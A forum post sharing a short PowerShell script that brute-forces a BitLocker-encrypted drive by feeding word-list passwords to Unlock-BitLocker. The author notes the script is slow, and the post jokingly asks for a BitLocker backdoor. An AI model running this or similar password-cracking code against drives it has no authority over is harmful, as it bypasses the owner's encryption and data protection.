Jump to content

Bruteforcing bitlocker through Powershell


icarus255

Recommended Posts

Wrote this little password brute forcing script in Powershell while trying to decrypt a bitlocked HDD. There are some brute forcers already available that will actually test the extracted crypto values from the HDD but they are slow and cumbersome. I wanted to see if brute forcing straight through windows would be any quicker and as expected... no 😞

The code basically takes input from a text file, converts it to a "SecureString" (needed or PS has a panic attack) and then tries to decrypt the HDD. At 0.5 guesses/second, I wouldn't worry about any large word lists but it works 🙂

This was just for a bit of fun but if you know of a way to speed up the script or make it more efficient please let me know as I wrote this really to get more familiar with PS. Better yet, if you know of a way to backdoor the bitlocker encryption that would be much appreciated 😉

Quote

# Need to run the script as powershell admin
# Define StreamReader and point it to your passwords list
$PWSstreamreader = New-Object System.IO.StreamReader("C:\temp\passwords.txt")
$linenumber = 1
#feeds line by line the candidates in passwords.txt
while (($readeachline =$PWSstreamreader.ReadLine()) -ne $null)
{
    Write-Host "$linenumber  $readeachline"
    # Need to convert our plaintext to SecureString for powershell to try and unlock. I guess this is some sort of security feature so people don't have plaintext passes lying around
    $SecureString = ConvertTo-SecureString "$readeachline" -AsPlainText -Force
    # Tries to unlock with converted SecureString.
    Unlock-BitLocker -MountPoint "D:" -Password $SecureString
    $info = Get-BitlockerVolume -MountPoint "D:"
    $linenumber++
    # Tests for decryption. Encrypted HDDs will always have a capacity of "0" so loops until capacity > 0 i.e. decrypted.
    If ($info.CapacityGB -ne "0") {Break}
}
$PWSstreamreader.Dispose()

 

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...